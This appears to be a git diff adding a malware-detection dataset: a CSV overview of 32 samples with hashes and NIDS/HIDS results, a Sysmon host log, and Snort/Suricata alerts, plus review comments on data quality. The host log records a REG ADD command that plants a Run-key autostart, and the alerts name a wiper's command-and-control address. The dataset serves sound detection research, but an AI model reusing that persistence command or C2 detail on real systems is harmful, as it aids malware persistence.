diff --git a/Malware_Samples_Overview.csv b/Malware_Samples_Overview.csv
new file mode 100644
index 0000000..79cf03a
--- /dev/null
+++ b/Malware_Samples_Overview.csv
@@ -0,0 +1,40 @@
+Sample_ID,Category,Sample_Name,Source_Name,First_Submission,Sample_Type,Virustotal,Result_NIDS,Result_HIDS_3,Result_HIDS_1,Result_HIDS_2,Sample_MD5,Sample_SHA256
+1,Cryptominer,Generic.Application.CoinMiner,DAS MALWERK,2018-08-28,"Win32 EXE
+",61/71,1,1,0,0,c22908fe460312d76b50129aa3ef2cf2,46f79c451e652fc4ce7ad5a6f9eb737642077c128e514c889458220ed6985913
+2,Backdoor,Win32:Malware-gen,VirusBay,2020-03-26,"Win32 EXE
+",35/73,0,1,0,0,e6a132e279806cc95684dc2bd67a0da0,ba07e07a2c279246901b613a26ed95dc37bce9e0aa1ba17d5e812a8e84bda164
+3,Backdoor,Trojan-Banker.Agent,VirusBay,2019-12-03,"Win32 EXE
+",37/68,1,0,0,0,aa52c9a86073b75748ec6c98eca17dab,09ab5a3c9583ed5cf63fc2e4641c7774edfd84127af69faacde4628881cbe157
+4,Backdoor,Trojan.DCRAT,ANY RUN,2020-05-13,Win32 EXE,48/72,0,1,,,1e2611836860d60a2a6b4c560ef74650,e67ac2ffa5e650be9139de22f0e543f1e3c84823e86abd80135d6117b2bc8060
+5,Backdoor,Trojan.Qbot,ANY RUN,2020-05-28,VBS,-,1,1,,,1c347009d6fce779bca8385395f26f94,2e57d9a80d45e2d78453c91829873260cdce4ac5f2cada73421a4a1faadbd445
+6,Backdoor,Trojan.Agent.Zenpak,VirusBay,2019-04-24,"Win32 EXE
+",58/72,0,0,,,fbe6d341c1b69975be74616d01c6d273,ec6097c4fdbe0736e416b58be0a4dd042c46a9cf7eef997b3eb72384609cbca9
+7,Backdoor,Shadowhammer,VirusBay,2019-3-27,application/x-rar,2/55,0,0,,,c09e41b3eb42eb79853de5bd1f5a5830,03466caff060a816688eb35f10b9bf3b8d44c364fde620cbb4e2c0c23309df79
+8,Backdoor,Backdoor.AsyncRAT,Virus Share,2019-08-12,"Win32 EXE
+",54/73,0,1,,,9f16a651f918972eee7be4f19d40bb91,041a4f5c60d5186913c46f9e0b246354f0944b03eb7d61325a60ae338faebbc8
+9,Backdoor,"Backdoor.Bladabindi
+",Virus Share,2019-08-26,Win32 EXE,66/72,0,1,0,0,c2c057d9645af7f64e9d11672840828e,a2dc89b1aa5e3b6ff023b87a45756f50c667d94e44fff760ddea39a2c07a100d
+10,Spyware,TrojanSpy.Win32,Virus Share,2019-02-18 ,Win32 EXE,60/69,-,-,,,19b11aa448409adc15c93e1fdd3c6774,2016ce2662c71ee8d4e63d5282ffe0c860ba95d3e8cff98462a9fdbef5211f9a
+11,Spyware,Trojan.Spyware,VirusBay,2019-10-14,Win32 EXE,61/71,1,0,,,40c0304b144736668ca2a0217d296c37,e24e4cf5454cbc5026f1a47d083ab22d6b823190ab72866601bfba07d3f0abf6
+12,Spyware,HTML.SpyAgent,Virus Share,2020-02-10,html,30/60,1,0,,,3b926d275ef56bb063d1e37042f211a3,fb0771b8040167e4b9510fe044a2357a0f4adc54f3bc5ab7a40cbae7ebd81d62
+13,Spyware,Keylogger.HawkEye,VirusBay,2020-01-30,Win32 EXE,47/72,1,1,,,8d897a409a231c4bdb21ac3bcf9118b1,b008c96b1ba6c13c4e922202baad57e199d9dee32a97a1443548c8a0ca303492
+14,Spyware,Spyware.PasswordStealer,Virus Share,2020-03-10,Win32 EXE,53/72,0,0,0,0,69ad26a3aae3e2950e5a93ccc0cd1859,f2f275ca7e7d46c5ddd0e59fa845f59ab527cc5284f16c64104d67599ab933c7
+15,Spyware,Trojan.GenKryptik,Virus Share,2020-02-06,Win32 EXE,55/73,0,0,0,0,9530e5c9e8591d5025e11a20f604520b,b64774a74e66515fbb11fed9bbba117b391f872d0b7b847acec67a4227de99a0
+16,Ransomware,Ransom.Cryakl,VirusBay,2020-03-02,Win32 EXE,55/73,0,1,0,0,23a8bfb5bdbff2f294506019cf2f425f,0fa979b1f894b44984d8ada55962e73dc48bd01359475e079aab4325503dded4
+17,Ransomware,Ramsom.Balaclav,VirusBay,2020-03-01,Win32 EXE,27/72,0,0,0,0,7ed4882c2a0d24c401cbce7536ddf792,5de4af86a4410fb6a4c7d54ba4586d35b6abbf2da183fed30ec71547a0a9f319
+18,Ransomware,Ransom.Ryuk,VirusBay,2020-01-14,Win32 EXE,55/72,0,1,,1,3f5da05d62a70eb1212db39d5d6cf45e,f361afd4dd267d6f74f262033b700da652b4da1c0a21e14a8a468f6093d48e31
+19,Ransomware,Trojan.DOCX,VirusBay,2019-11-19 ,DOCX,35/62,0,1,0,0,1a26c9b6ba40e4e3c3dce12de266ae10,6ccb6c2b2c074eea6e1bd9bb7ff2841fdf5466c646780a7644fbd907098f5b27
+20,Spyware,Trojan.Lucifer,ANY RUN,2020-03-20,Win32 EXE,51/71,1,1,0,0,66a3124fe4ed45fae20e2bd4ee33c626,630efa1e2dc642799b867363bb36d1953884480ac29942a1ab20243a8a9620ad
+21,Adware,Adware.Linkvertise,ANY RUN,2020-04-06,Win32 EXE,13/72,1,0,0,0,25fcd5a2cc5590630ab8d971e82b70cb,422ea9cb2110591c932a58f32c8672aba1b08d3dd3e1d53c1edba0101b79174e
+22,Rootkit,Rootkit.Bandios,ANY RUN,2018-03-23,Win32 EXE,52/71,0,0,0,0,4b042bfd9c11ab6a3fb78fa5c34f55d0,59c662a5207c6806046205348b22ee45da3f685fe022556716dbbd6643e61834
+23,Ransomware,Ransom.GandCrab,ANY RUN,2020-05-18,Win32 EXE,36/72,1,1,,,d543a6c58e8e92d0b2f33abb270a4c3d,e94f7acb84d2b58a3019627ca866d1424f4d35520eb0da2fe33c1204b51545f2
+24,Cryptominer,Miner.XMRig,ANY RUN,2019-08-24,Win32 EXE,56/71,0,0,,,5616a3471565d34d779b5b3d0520bb70,9194b57673209c8534888f61b0cdefa34f463ae50cd78f72ab2b3348220baaf9
+25,Cryptominer,Miner.lemon_duck,ANY RUN,2020-05-25,ps1,-,1,1,,,28b80843b13fab0986479b54310c8053,2520779dbaa8eebfde61aa4193bf75a44a89f8a7a8dcce12072f7fea1956b53d
+26,Cryptominer,Trojan.Glupteba.Qwertyminer,ANY RUN,2020-05-04 ,Win32 EXE,60/72,1,0,,,d668e0990354d0ae209ec520cb80e052,5eb910915a13863b04317d17244c8d68cf9fad949f6ab6e5182861160f099e5f
+27,Cryptominer,Miner.Tofsee,ANY RUN,2020-03-12,Win32 EXE,53/73,1,1,,,488bfb786944d1b236ac6254eb97dd69,3787e0f44b282dfcb0238c072490f8fd36c22fa40b1895dd52abed931e5385d3
+28,Rootkit,Rootkit.Lamberts,Virus Share,2019-08-01,Win32 EXE,55/73,0,1,,,a00918f782ba83aa405614430c65aab6,adf6c75d1265e189036d4b5303feaeecb83f6d60db54c36544c43790cde26ace
+29,Adware,Adware.Mindspark,Virus Share,2020-03-12 ,Win32 EXE,40/72,0,0,,,aeb471c20095e7d8557478a518d0fc8c,7e22bfc85e7cbd2ebca4f8f7900067b596cd5a8179acc2f211715ea230c41f0a
+30,Adware,Adware.Sogou,Virus Share,2020-03-30,Win32 EXE,48/73,1,0,,,775307b867b19872f49aaa9fcc7c6800,013490159463a92d1f6f5b73618dcd143e3d9948fb82f094440368494db03659
+31,Adware,Adware.FusionCore,Virus Share,2020-04-15,Win32 EXE,20/72,0,1,,,d4ce88978ea01afe4ec930e59f9abf61,"248dfd79d264aae38e13502609ce771e4ce0be63747d0c1e0c933e2ce0ebe097
+"
+32,Adware,Adware.Unruy,Virus Share,2019-09-04,Win32 EXE,55/68,1,0,,,3a4c09aba1b399a43a65a27aee9c90e0,369ed4c562a09c275e87bd6bed8c93b51b8460eb0cafd506dff8417ffdf5fba7
diff --git a/data/MW_11_HIDS_3.csv b/data/MW_11_HIDS_3.csv
new file mode 100644
index 0000000..402a65b
--- /dev/null
+++ b/data/MW_11_HIDS_3.csv
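Review bot: Seven records in this table carry a raw line break inside a quoted cell (`"Win32 EXE` followed by a newline in rows 1, 2, 3, 6 and 8, `"Backdoor.Bladabindi` in row 9, and the SHA256 of row 31), so any line-oriented reader sees 39 data lines instead of 32 records and splits those rows mid-field; trimming the cells before export, so that row 1 starts `1,Cryptominer,Generic.Application.CoinMiner,DAS MALWERK,2018-08-28,Win32 EXE,61/71,...`, removes the problem. Missing values are written three ways (an empty cell, `-` in `Virustotal`, and `-` in the Result columns of row 10), several `First_Submission` cells carry a trailing space (`2019-02-18 `) or an unpadded month (`2019-3-27`), and row 17 reads `Ramsom.Balaclav`, all of which defeat naive grouping and date parsing. Nothing on the page says what `Result_NIDS` and `Result_HIDS_1..3` encode (presumably 1 = alert raised, 0 = none, blank = not run — confirm) or which sensor each HIDS number denotes; a one-line legend in the README would let the table be used on its own.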
@@ -0,0 +1,49 @@
+timestamp,"rule.level","rule.description","data.win.system.message","data.win.eventdata.commandLine","data.win.eventdata.targetObject","full_log","data.win.eventdata.details"
+"May 28, 2020 @ 13:22:12.959",10,"Multiple Windows error events","""Id = {00000000-0000-0000-0000-000000000000}; ClientMachine = DESKTOP-HUE026H; User = NT AUTHORITY\NETWORK SERVICE; ClientProcessId = 5600; Component = Unknown; Operation = Start IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Manufacturer, Product FROM Win32_BaseBoard; ResultCode = 0x80041032; PossibleCause = Unknown""",,,,
+"May 28, 2020 @ 13:21:49.944",7,"Integrity checksum changed.",,,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon' checksum changed.
+Old md5sum was: '27300ec6be2cfda4d500eefcbc4b10bb'
+New md5sum is : '493b3b79baa4e287a340e5208a74d0bf'
+Old sha1sum was: '685578e969396191bfb7c8bee92758a0267d52d6'
+New sha1sum is : 'a1a3c1396dd3e1aab1a289c3e05d7742f33dd7a3'
+",
+"May 28, 2020 @ 13:21:49.929",7,"Integrity checksum changed.",,,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\VolatileUserMgrKey\1\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed.
+Old md5sum was: '7b36002bf72275589ffef5f6fc1a89c6'
+New md5sum is : '31795626566594565f825d3dd21c4a1b'
+Old sha1sum was: 'a2d59c332c46bedea96282e398f570f4032d8d5b'
+New sha1sum is : '37c1e2f897e63b8f8da74b8417d2353b2fb9c0b3'
+",
+"May 28, 2020 @ 13:20:24.537",9,"Benchmark for Windows audit: Ensure 'MSS: (AutoAdminLogon) Enable Automatic Logon (not recommended)' is set to 'Disabled': Status changed from 'not applicable' to failed",,,,,
+"May 28, 2020 @ 13:20:15.707",7,"SessionEnv was unavailable to handle a critical notification event","""The winlogon notification subscriber was unavailable to handle a critical notification event.""",,,,
+"May 28, 2020 @ 13:16:08.252",10,"ATT&CK T1060: Autorun Keys Modification","""Registry value set:
+RuleName: T1060,RunKey
+EventType: SetValue
+UtcTime: 2020-05-28 12:50:22.647
+ProcessGuid: {df9fc3d3-b38e-5ecf-0000-001084d02200}
+ProcessId: 5724
+Image: C:\Windows\SysWOW64\reg.exe
+TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\RESTART_STICKY_NOTESS
+Details: C:\Users\JOHNWI~1\AppData\Local\Temp\StikyNote.exe""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\RESTART_STICKY_NOTESS","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:22.648944600Z"",""eventRecordID"":""2033"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-28 12:50:22.647\r\nProcessGuid: {df9fc3d3-b38e-5ecf-0000-001084d02200}\r\nProcessId: 5724\r\nImage: 
C:\\Windows\\SysWOW64\\reg.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\RESTART_STICKY_NOTESS\r\nDetails: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\StikyNote.exe\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-28 12:50:22.647"",""processGuid"":""{df9fc3d3-b38e-5ecf-0000-001084d02200}"",""processId"":""5724"",""image"":""C:\\\\Windows\\\\SysWOW64\\\\reg.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\RESTART_STICKY_NOTESS"",""details"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\StikyNote.exe""}}}","C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\StikyNote.exe" +"May 28, 2020 @ 13:16:08.220",10,"ATT&CK T1060: Direct Autorun Keys Modification","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:22.635 +ProcessGuid: {df9fc3d3-b38e-5ecf-0000-001084d02200} +ProcessId: 5724 +Image: C:\Windows\SysWOW64\reg.exe +FileVersion: 10.0.18362.476 (WinBuild.160101.0800) +Description: Registry Console Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: reg.exe +CommandLine: REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v RESTART_STICKY_NOTESS /f /t REG_SZ /d ""C:\Users\JOHNWI~1\AppData\Local\Temp\StikyNote.exe"" +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=A01B3DFF957379E7632891A7992319CE,SHA256=45EFF48450C110B8A6D2A4C0FE31323423851298F6DADF32D73DF91DF7ECB797,IMPHASH=869B9FF91668F96EF68FBE0DB3602587 +ParentProcessGuid: {df9fc3d3-b38e-5ecf-0000-0010e3ca2200} +ParentProcessId: 4776 +ParentImage: C:\Windows\SysWOW64\cmd.exe +ParentCommandLine: ""C:\Windows\System32\cmd.exe"" /c REG ADD 
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v RESTART_STICKY_NOTESS /f /t REG_SZ /d ""C:\Users\JOHNWI~1\AppData\Local\Temp\StikyNote.exe""""","REG ADD HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /v RESTART_STICKY_NOTESS /f /t REG_SZ /d \""C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\StikyNote.exe\""",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:22.639126700Z"",""eventRecordID"":""2032"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:22.635\r\nProcessGuid: {df9fc3d3-b38e-5ecf-0000-001084d02200}\r\nProcessId: 5724\r\nImage: C:\\Windows\\SysWOW64\\reg.exe\r\nFileVersion: 10.0.18362.476 (WinBuild.160101.0800)\r\nDescription: Registry Console Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: reg.exe\r\nCommandLine: REG ADD HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /v RESTART_STICKY_NOTESS /f /t REG_SZ /d \""C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\StikyNote.exe\""\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=A01B3DFF957379E7632891A7992319CE,SHA256=45EFF48450C110B8A6D2A4C0FE31323423851298F6DADF32D73DF91DF7ECB797,IMPHASH=869B9FF91668F96EF68FBE0DB3602587\r\nParentProcessGuid: {df9fc3d3-b38e-5ecf-0000-0010e3ca2200}\r\nParentProcessId: 4776\r\nParentImage: C:\\Windows\\SysWOW64\\cmd.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\cmd.exe\"" /c REG ADD 
HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /v RESTART_STICKY_NOTESS /f /t REG_SZ /d \""C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\StikyNote.exe\""\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:22.635"",""processGuid"":""{df9fc3d3-b38e-5ecf-0000-001084d02200}"",""processId"":""5724"",""image"":""C:\\\\Windows\\\\SysWOW64\\\\reg.exe"",""fileVersion"":""10.0.18362.476 (WinBuild.160101.0800)"",""description"":""Registry Console Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""reg.exe"",""commandLine"":""REG ADD HKCU\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run /v RESTART_STICKY_NOTESS /f /t REG_SZ /d \\\""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\StikyNote.exe\\\"""",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=A01B3DFF957379E7632891A7992319CE,SHA256=45EFF48450C110B8A6D2A4C0FE31323423851298F6DADF32D73DF91DF7ECB797,IMPHASH=869B9FF91668F96EF68FBE0DB3602587"",""parentProcessGuid"":""{df9fc3d3-b38e-5ecf-0000-0010e3ca2200}"",""parentProcessId"":""4776"",""parentImage"":""C:\\\\Windows\\\\SysWOW64\\\\cmd.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\cmd.exe\\\"" /c REG ADD HKCU\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run /v RESTART_STICKY_NOTESS /f /t REG_SZ /d \\\""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\StikyNote.exe\\\""""}}}", +"May 28, 2020 @ 13:15:58.499",10,"Multiple Windows error events","""Id = {00000000-0000-0000-0000-000000000000}; ClientMachine = DESKTOP-HUE026H; User = DESKTOP-HUE026H\John Williams; ClientProcessId = 7104; Component = Unknown; Operation = Start IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PhysicalMemory WHERE Tag='Physical Memory 0'; 
ResultCode = 0x80041032; PossibleCause = Unknown""",,,,
diff --git a/data/MW_11_NIDS.csv b/data/MW_11_NIDS.csv
new file mode 100644
index 0000000..b1a910a
--- /dev/null
+++ b/data/MW_11_NIDS.csv
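Review bot: The level-10 `ATT&CK T1060: Autorun Keys Modification` rows in this file do not match the overview table, where row 11 records `Result_HIDS_3` as 0 (`11,Spyware,Trojan.Spyware,VirusBay,2019-10-14,Win32 EXE,61/71,1,0,,,`); either the file name does not map to `Sample_ID` 11 the way it appears to, or that cell is wrong, and a README line defining the Result columns would settle which. The first column is ingest time rather than event time: the Sysmon rows are stamped `13:16:08` but carry `UtcTime: 2020-05-28 12:50:22.647`, about 26 minutes earlier, which points to ingest delay or a lagging sensor clock, so correlating these rows with the NIDS export (where the two clocks differ by seconds) has to key on the embedded `UtcTime`/`systemTime`, and a note saying so would prevent wrong timelines. The `data.win.system.message` and `full_log` cells contain literal newlines inside quotes, so the file must be read with a quote-aware CSV parser rather than split on line breaks.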
@@ -0,0 +1,159 @@ +"@timestamp",message,"log.file.path" +"May 28, 2020 @ 13:24:34.073","05/28/2020-13:24:28.152599 [**] [1:2808510:5] ETPRO MALWARE StoneDrill Wiper Checkin 2 [**] [Classification: Malware Command and Control Activity Detected] [Priority: 1] {TCP} 172.16.2.2:49730 -> 58.158.177.102:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:24:32.138","05/28-13:24:27.783879 [**] [1:2808510:3] ETPRO TROJAN StoneDrill Wiper Checkin 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49730 -> 58.158.177.102:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:24:25.119","05/28-13:24:17.047834 [**] [1:2808510:3] ETPRO TROJAN StoneDrill Wiper Checkin 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49729 -> 58.158.177.102:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:24:19.019","05/28/2020-13:24:17.480930 [**] [1:2808510:5] ETPRO MALWARE StoneDrill Wiper Checkin 2 [**] [Classification: Malware Command and Control Activity Detected] [Priority: 1] {TCP} 172.16.2.2:49729 -> 58.158.177.102:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:24:12.015","05/28/2020-13:24:06.741714 [**] [1:2808510:5] ETPRO MALWARE StoneDrill Wiper Checkin 2 [**] [Classification: Malware Command and Control Activity Detected] [Priority: 1] {TCP} 172.16.2.2:49728 -> 58.158.177.102:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:24:10.115","05/28-13:24:06.453966 [**] [1:2808510:3] ETPRO TROJAN StoneDrill Wiper Checkin 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49728 -> 58.158.177.102:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:24:03.111","05/28-13:23:54.111967 [**] [1:2808510:3] ETPRO TROJAN StoneDrill Wiper Checkin 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49727 -> 58.158.177.102:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:23:56.908","05/28/2020-13:23:54.863852 [**] [1:2808510:5] ETPRO MALWARE StoneDrill 
Wiper Checkin 2 [**] [Classification: Malware Command and Control Activity Detected] [Priority: 1] {TCP} 172.16.2.2:49727 -> 58.158.177.102:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:23:49.905","05/28/2020-13:23:43.847547 [**] [1:2808510:5] ETPRO MALWARE StoneDrill Wiper Checkin 2 [**] [Classification: Malware Command and Control Activity Detected] [Priority: 1] {TCP} 172.16.2.2:49724 -> 58.158.177.102:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:23:48.109","05/28-13:23:43.565839 [**] [1:2808510:3] ETPRO TROJAN StoneDrill Wiper Checkin 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49724 -> 58.158.177.102:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:23:34.899","05/28/2020-13:23:32.262467 [**] [1:2808510:5] ETPRO MALWARE StoneDrill Wiper Checkin 2 [**] [Classification: Malware Command and Control Activity Detected] [Priority: 1] {TCP} 172.16.2.2:49723 -> 58.158.177.102:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:23:33.106","05/28-13:23:31.973272 [**] [1:2808510:3] ETPRO TROJAN StoneDrill Wiper Checkin 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49723 -> 58.158.177.102:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:23:27.880","05/28/2020-13:23:20.300903 [**] [1:2808510:5] ETPRO MALWARE StoneDrill Wiper Checkin 2 [**] [Classification: Malware Command and Control Activity Detected] [Priority: 1] {TCP} 172.16.2.2:49722 -> 58.158.177.102:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:23:26.104","05/28-13:23:19.324741 [**] [1:2808510:3] ETPRO TROJAN StoneDrill Wiper Checkin 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49722 -> 58.158.177.102:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:23:12.812","05/28/2020-13:23:08.961232 [**] [1:2808510:5] ETPRO MALWARE StoneDrill Wiper Checkin 2 [**] [Classification: Malware Command and Control Activity Detected] [Priority: 1] {TCP} 172.16.2.2:49721 -> 
58.158.177.102:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:23:11.100","05/28-13:23:08.636763 [**] [1:2808510:3] ETPRO TROJAN StoneDrill Wiper Checkin 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49721 -> 58.158.177.102:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:23:05.791","05/28/2020-13:23:02.348168 [**] [1:2808510:5] ETPRO MALWARE StoneDrill Wiper Checkin 2 [**] [Classification: Malware Command and Control Activity Detected] [Priority: 1] {TCP} 172.16.2.2:49720 -> 58.158.177.102:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:23:03.966","05/28-13:23:02.054105 [**] [1:2808510:3] ETPRO TROJAN StoneDrill Wiper Checkin 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49720 -> 58.158.177.102:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:22:58.788","05/28/2020-13:22:56.753812 [**] [1:2808510:5] ETPRO MALWARE StoneDrill Wiper Checkin 2 [**] [Classification: Malware Command and Control Activity Detected] [Priority: 1] {TCP} 172.16.2.2:49719 -> 58.158.177.102:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:22:56.963","05/28-13:22:56.481856 [**] [1:2808510:3] ETPRO TROJAN StoneDrill Wiper Checkin 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49719 -> 58.158.177.102:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:22:53.962","05/28-13:22:50.913013 [**] [1:2808510:3] ETPRO TROJAN StoneDrill Wiper Checkin 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49718 -> 58.158.177.102:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:22:51.784","05/28/2020-13:22:51.195145 [**] [1:2808510:5] ETPRO MALWARE StoneDrill Wiper Checkin 2 [**] [Classification: Malware Command and Control Activity Detected] [Priority: 1] {TCP} 172.16.2.2:49718 -> 58.158.177.102:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:22:48.758","05/28/2020-13:22:45.617551 [**] [1:2808510:5] ETPRO MALWARE StoneDrill Wiper 
Checkin 2 [**] [Classification: Malware Command and Control Activity Detected] [Priority: 1] {TCP} 172.16.2.2:49717 -> 58.158.177.102:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:22:46.926","05/28-13:22:45.288667 [**] [1:2808510:3] ETPRO TROJAN StoneDrill Wiper Checkin 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49717 -> 58.158.177.102:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:22:43.924","05/28-13:22:39.543029 [**] [1:2808510:3] ETPRO TROJAN StoneDrill Wiper Checkin 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49715 -> 58.158.177.102:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:22:41.757","05/28/2020-13:22:39.922313 [**] [1:2808510:5] ETPRO MALWARE StoneDrill Wiper Checkin 2 [**] [Classification: Malware Command and Control Activity Detected] [Priority: 1] {TCP} 172.16.2.2:49715 -> 58.158.177.102:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:22:36.922","05/28-13:22:33.567205 [**] [1:2808510:3] ETPRO TROJAN StoneDrill Wiper Checkin 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49714 -> 58.158.177.102:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:22:34.754","05/28/2020-13:22:34.222391 [**] [1:2808510:5] ETPRO MALWARE StoneDrill Wiper Checkin 2 [**] [Classification: Malware Command and Control Activity Detected] [Priority: 1] {TCP} 172.16.2.2:49714 -> 58.158.177.102:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:22:31.752","05/28/2020-13:22:28.042449 [**] [1:2808510:5] ETPRO MALWARE StoneDrill Wiper Checkin 2 [**] [Classification: Malware Command and Control Activity Detected] [Priority: 1] {TCP} 172.16.2.2:49712 -> 58.158.177.102:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:22:31.752","05/28/2020-13:22:28.286183 [**] [1:2808510:5] ETPRO MALWARE StoneDrill Wiper Checkin 2 [**] [Classification: Malware Command and Control Activity Detected] [Priority: 1] {TCP} 172.16.2.2:49713 -> 
